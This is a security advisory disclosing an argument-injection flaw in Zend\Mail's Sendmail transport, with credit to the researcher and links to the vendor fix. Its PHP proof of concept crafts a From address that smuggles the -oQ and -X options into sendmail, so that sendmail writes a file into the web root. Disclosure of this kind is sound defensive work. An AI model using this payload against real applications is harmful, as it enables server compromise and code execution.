SSD Advisory – ZendMail Remote Command Execution Vulnerability

Vulnerability Summary
The following report describes a remote code execution vulnerability found in ZendMail. The vulnerability allows an attacker injecting additional parameters to the sendmail binary via the From address.
Credit
An independent security researcher Dawid Golunski (https://legalhackers.com/) has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

Vulnerability Details
“Zend\Mail provides generalized functionality to compose and send both text and MIME-compliant multipart email messages. Mail can be sent with Zend\Mail via the Mail\Transport\Sendmail, Mail\Transport\Smtp or the Mail\Transport\File transport. Of course, you can also implement your own transport by implementing the Mail\Transport\TransportInterface.”
http://framework.zend.com/manual/current/en/modules/zend.mail.introduction.html
When using Zend\Mail class from ZendMail/Zend framework to send emails with Mail\Transport\Sendmail transport, a malicious user might be able to inject arbitrary parameters to sendmail program due to insufficient address sanitization. If an attacker can control email headers , he could bypass sanitization by adding additional quote characters within a malicious email address.
Prof of Concept

<?php
use Zend\Mail;
$mail = new Mail\Message();
$mail->setBody('This is the text of the email.');
$mail->setFrom('"AAA\" -oQ/tmp -X/var/www/exploited.php BBB"@domain', 'Sender\'s name');
$mail->addTo('hacker@localhost', 'Name of recipient');
$mail->setSubject('TestSubject');
$transport = new Mail\Transport\Sendmail();
echo "gonna send...";
$transport->send($mail);
?>

will inject -oQ and -X parameters to sendmail command.
Vendor response
Release announcement can be found here: https://framework.zend.com/blog/2016-12-20-zf-2-4-11-released.html
Advisor can be found here: https://framework.zend.com/security/advisory/ZF2016-04